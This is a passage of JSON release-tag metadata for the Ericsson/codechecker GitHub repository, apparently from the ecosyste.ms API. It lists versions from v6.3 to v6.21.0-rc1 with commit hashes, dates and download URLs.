on/codechecker@v6.20.0-hotfix4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix4/manifests"},{"name":"v6.21.0-rc1","sha":"b629fb04a7f05dbbc74aff0616add06ef9b26dd1","kind":"commit","published_at":"2022-10-27T09:41:02.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.21.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.21.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.21.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.21.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.21.0-rc1/manifests"},{"name":"v6.20.0-hotfix3","sha":"49a50a849df44881e7709cb26f7daa2380139359","kind":"commit","published_at":"2022-09-26T17:11:33.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-hotfix3","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-hotfix3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-hotfix3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix3/manifests"},{"name":"v6.20.0-hotfix2","sha":"b518f9af122c36fc9896a2f1fafe417395e2e82e","kind":"commit","published_at":"2022-09-21T18:46:30.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-hotfix2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-hotfix2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-hotfix2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix2/manifests"},{"name":"v6.20.0-hotfix1","sha":"0297574b742ab8186665c3a5d2917fa89245b59f","kind":"commit","published_at":"2022-09-19T17:24:52.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix1/manifests"},{"name":"v6.20.0","sha":"7d65d89c2a3fed84f395016d4c9815bab860d0b3","kind":"commit","published_at":"2022-09-15T11:44:34.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0/manifests"},{"name":"v6.20.0-rc1","sha":"d24c22cd39a9e7a9145c5293843c6450e31862db","kind":"commit","published_at":"2022-08-22T21:27:06.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-rc1/manifests"},{"name":"v6.19.1-hotfix2","sha":"c0af8d9a42f75f28ccfdc149194e5cc95be14841","kind":"commit","published_at":"2022-07-21T15:16:12.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.19.1-hotfix2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.19.1-hotfix2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.19.1-hotfix2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1-hotfix2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1-hotfix2/manifests"},{"name":"v6.19.1-hotfix1","sha":"d564db65a58fc7ef651ab1474a72eadf4c29c55f","kind":"commit","published_at":"2022-07-06T13:28:50.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.19.1-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.19.1-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.19.1-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1-hotfix1/manifests"},{"name":"v6.19.1","sha":"9fa0f9817f6e91eda2a9202e0a3bf5006accdc8c","kind":"commit","published_at":"2022-03-18T15:09:57.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.19.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1/manifests"},{"name":"v6.19.0-hotfix1","sha":"e262d015068c6b49f92a2afb1a166eb4f4438e84","kind":"commit","published_at":"2022-03-12T13:05:51.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.19.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.19.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.19.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.0-hotfix1/manifests"},{"name":"v6.19.0","sha":"5f5b6b7e7ecd70d23079580c063f4e4f2bb2a7ad","kind":"commit","published_at":"2022-03-10T13:18:49.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.19.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.0/manifests"},{"name":"v6.18.2-hotfix1","sha":"359e88b9339946cba84c00ad32511be8b7fad65d","kind":"commit","published_at":"2022-02-03T09:31:32.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.18.2-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.18.2-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.18.2-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.2-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.2-hotfix1/manifests"},{"name":"v6.18.2","sha":"992d274c78b9a0436328c30a40d3b1de899902e2","kind":"commit","published_at":"2022-01-14T14:04:31.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.18.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.2/manifests"},{"name":"v6.18.1","sha":"fd5f7e04219f947cfda68e9e11f4d3b07f0564a5","kind":"commit","published_at":"2021-12-10T07:28:26.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.18.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.1/manifests"},{"name":"v6.18.0-hotfix1","sha":"a46603ab87348ff5e9bf5016fd906e9ef6781eb4","kind":"commit","published_at":"2021-11-18T17:46:56.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.18.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.18.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.18.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.0-hotfix1/manifests"},{"name":"v6.18.0","sha":"153b0e09efc715fd16eee815eecf454f9f79f7f1","kind":"commit","published_at":"2021-11-12T12:51:42.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.18.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.0/manifests"},{"name":"v6.17.0-hotfix1","sha":"315d4494603b02252966770452e676fd63a67021","kind":"commit","published_at":"2021-10-14T12:22:47.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.17.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.17.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.17.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.17.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.17.0-hotfix1/manifests"},{"name":"v6.17.0","sha":"d0e2d7ba5f62d722e907d1ce8af6dbb24ee34e5d","kind":"commit","published_at":"2021-09-10T14:05:16.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.17.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.17.0/manifests"},{"name":"v6.16.0-hotfix1","sha":"dcb4c5c74697711e0b65bb88b1796aec34846649","kind":"commit","published_at":"2021-06-23T13:36:13.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.16.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.16.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.16.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.16.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.16.0-hotfix1/manifests"},{"name":"v6.16.0","sha":"8880695af939838b2e1e16b018c51ed66c6a5366","kind":"commit","published_at":"2021-06-01T12:07:59.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.16.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.16.0/manifests"},{"name":"v6.15.2","sha":"63740679d61ff715175b9f31858d2fe9767efa41","kind":"commit","published_at":"2021-04-06T13:47:08.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.15.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.2/manifests"},{"name":"v6.15.1-hotfix1","sha":"55c53a71295e07ea9ae3370130e6495649e8760a","kind":"commit","published_at":"2021-03-10T10:18:49.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.15.1-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.15.1-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.15.1-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.1-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.1-hotfix1/manifests"},{"name":"v6.15.1","sha":"692e51ba4be08e97c4b07cc344edca082dc50f63","kind":"commit","published_at":"2021-02-03T12:52:17.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.15.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.1/manifests"},{"name":"v6.15.0-hotfix1","sha":"267e9cb77e55f77a457b3b1f2f3660f35564939e","kind":"commit","published_at":"2021-01-08T11:03:43.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.15.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.15.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.15.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.0-hotfix1/manifests"},{"name":"v6.15.0","sha":"131861b7e94298f58cad883a533814573b89a0f3","kind":"commit","published_at":"2020-11-12T23:55:40.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.15.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.0/manifests"},{"name":"v6.14.0","sha":"644f900e80e2053cdb7d69eee3dfa34e622c185c","kind":"commit","published_at":"2020-09-11T13:12:47.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.14.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.14.0/manifests"},{"name":"v6.13.0","sha":"17678b103375a9dbff6e69328d0996d54de78ef3","kind":"commit","published_at":"2020-07-10T13:24:53.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.13.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.13.0/manifests"},{"name":"v6.12.1","sha":"be4c6ac31f125be8432589ea9e9e5b1bbd838d22","kind":"commit","published_at":"2020-06-12T11:46:39.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.12.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.12.1/manifests"},{"name":"v6.12.0","sha":"ecccb6308db0a16d80bb6273280d482576d28d8b","kind":"commit","published_at":"2020-05-14T17:59:12.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.12.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.12.0/manifests"},{"name":"v6.11.1","sha":"9bb0047368707a18efaca3a207dc8227c8e19b9e","kind":"commit","published_at":"2020-02-12T23:12:06.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.11.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.11.1/manifests"},{"name":"v6.11.0","sha":"65a042f1ad0dec5581d54cb13396d201a573c0b2","kind":"commit","published_at":"2019-12-12T16:41:02.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.11.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.11.0/manifests"},{"name":"v6.10.1","sha":"d3928e30d25bd10da977d2d1119f300a30179cc0","kind":"commit","published_at":"2019-10-09T14:33:54.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.10.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.10.1/manifests"},{"name":"v6.10.0","sha":"28cb13900c6e2ada55f469d267e05cab9844a97a","kind":"commit","published_at":"2019-07-11T18:00:44.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.10.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.10.0/manifests"},{"name":"v6.9.1","sha":"197579e082c64e42043683b4e14ae2228a5c7d89","kind":"commit","published_at":"2019-04-11T13:22:48.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.9.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.9.1/manifests"},{"name":"v6.9.0","sha":"03351d259b47a57d0c0daebf2a2b00149ea37298","kind":"commit","published_at":"2019-02-08T14:26:17.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.9.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.9.0/manifests"},{"name":"v6.8.1","sha":"e8b4c6172b45428f997c0e7f37891e11ae312180","kind":"commit","published_at":"2018-11-08T10:10:47.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.8.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.8.1/manifests"},{"name":"v6.8.0","sha":"2bd99a0b24b4b62fb85992f94ab682c4a9ddc362","kind":"commit","published_at":"2018-09-11T11:33:21.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.8.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.8.0/manifests"},{"name":"v6.7.1","sha":"968bd5ae5f82fe2d5d329005a2e7748c1200d8fc","kind":"commit","published_at":"2018-06-08T09:08:07.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.7.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.7.1/manifests"},{"name":"v6.7.0","sha":"9c4f1c514517af66c92e8b73332a79f2adf69e73","kind":"commit","published_at":"2018-05-16T11:22:56.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.7.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.7.0/manifests"},{"name":"v6.6.0","sha":"d507de883bd29bdc8221e8ecb74c9d1117ad5867","kind":"commit","published_at":"2018-03-22T14:30:07.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.6.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.6.0/manifests"},{"name":"v6.5.1","sha":"fd2df3820f3985e4b2e2b576d0cc9aa9c2474348","kind":"commit","published_at":"2018-02-22T16:01:26.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.5.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.5.1/manifests"},{"name":"v6.5","sha":"7370d62dccac3c5ce2771764fa92b8e3bc22bbac","kind":"commit","published_at":"2018-02-07T12:01:41.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.5","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.5/manifests"},{"name":"v6.4","sha":"32ea3cf57eb71255307c065ff8bac6513e0064b9","kind":"commit","published_at":"2018-01-11T14:04:15.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.4","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.4/manifests"},{"name":"v6.3","sha":"44c2a7740fa27b9459c40daea2b7836b1c8ca250","kind":"commit","published_at":"2017-12-11T19:02:13.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.3","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.3","dependencies_p